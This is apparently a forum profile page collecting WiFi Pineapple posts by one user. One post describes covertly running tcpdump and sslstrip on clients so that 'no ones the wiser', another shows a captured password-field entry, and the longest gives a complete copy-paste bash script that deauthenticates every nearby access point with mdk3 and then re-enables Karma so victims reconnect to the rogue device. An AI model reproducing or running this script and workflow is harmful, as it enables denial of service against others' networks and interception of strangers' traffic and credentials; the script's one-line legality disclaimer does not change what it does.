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Boba Fett

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Posts posted by Boba Fett

  1. I like to run my pineapple as a "headless" sorta thing, so I do it via button press. I run an old firmware, cause I'm old school like that (don't ask, Seb will kick my ass if I encourage people to not upgrade lol) so the wps button still works for me. Maybe its fixed on 2.8? I'm not positive...

    The commands I use are on the wiki, which should be the first stop for any newbie imho, but I'll link them here for ya.





    As for speed, the pineapple has never slowed down due to capturing packets/ssl, but I typically have 2-3 clients, not 20. At SXSW, Darren had like 40+ clients and the pineapple continued ass kicking, so it should be do-able.

    Anyways, I just put the tcpdump and sslstrip commands into a small script thats tied to my wps button - as an added trick, I have the LED's turn off when the script is run so I have visual confirmation that its working. Then I have a cronjob that sends me an email every 10 minutes with status updates (a how-to is also linked on the wiki) so I can casually check my email on my phone, and no ones the wiser. This is just one way of doing things, and it works well for me. Some people run the stock UI with custom CSS and all the infusions, others run Moriarty's UWUI, which is also pretty awesome and something to check out. The worlds your hacked open oyster with the pineapple, so welcome to the community and be sure to contribute as much as you can!


    WOW Can you teach us that scripts? Tutorial time?

  2. This it´s the expected output method?

        [0] => h
        [1] => code:104
        [2] => element_name:password
        [3] => element_id:Unknown
        [4] => form:Unknown
        [5] => url:http://cloud.wifipineapple.com/index.php?portal
        [6] => group:1430
  3. Hey guys!

    I am currently making a script that basically :

    -Asks how long to deauth for

    -Asks what interface to deauth on

    -Disables karma

    -Puts wlan0 into RFMON (Monitor Mode)

    -Starts MDK3 Deauthing for x amount of seconds inputted at the beginning

    -After x amount of seconds, Stops MDK3

    -Removes mon0

    -Starts karma again

    The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :)

    Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to copy the new code into the existing script you have...

    Edit : Version 1.1 - Added how long to deauth for and choice on what interface to deauth on.

    Edit : Version 1.1.2 - Fixed deauthing on all channels!

    Edit : Version 1.1.3 - Fixed a typo that could stop MDK3 starting.

    Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :)

    Please give some feedback and any improvements :)

    Code :

    #Part of the Pineapple Mojito Framework
    #Made by Foxtrot
    #Version 1.2
    echo "!! This script is to be used only for legal, safe and authorised uses !!"
    echo "MDKarma V1.2"
    sleep 6
    #Ask how long to deauth for
    echo -n "How long (In Seconds) to deauth for? : "; read deauthTime
    #Ask what Interface
    echo -n "What interface would you like to deauth on? : "; read deauthInterface
    #Ask if you want to whitelist
    read -r -p "Do you want to add a whitelist? [Y/n] " response
    if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
        echo "   "
        echo "Whitelist Created!"
        echo "  "
        touch whitelist.txt
        read -r -p "MAC Address to add : " macaddr
        echo $macaddr >> whitelist.txt
        echo "   "
        echo "Avoiding Whitelist Creation!"
        echo "  "
    #Put wlan0 up
    echo "Checking Interface wlan0 is up...."
    sleep 3
    #Stop Karma
    echo "   "
    echo "Killing Karma...."
    hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null
    sleep 3
    #Put deauthInterface into monitor mode
    echo "   "
    echo "Putting $deauthInterface into monitor mode...."
    airmon-ng start $deauthInterface > /dev/null
    sleep 3
    #Start deauthing with MDK3 and stop
    echo "   "
    echo "Deauthing Access Points with MDK3...."
    mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3
    sleep 3
    #Kill airmon-ng and start Karma again.
    echo "Removing mon0 and enabling karma...."
    airmon-ng stop mon0 > /dev/null
    hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null
    sleep 3
    echo "  "
    echo "MDKarma Finished!"



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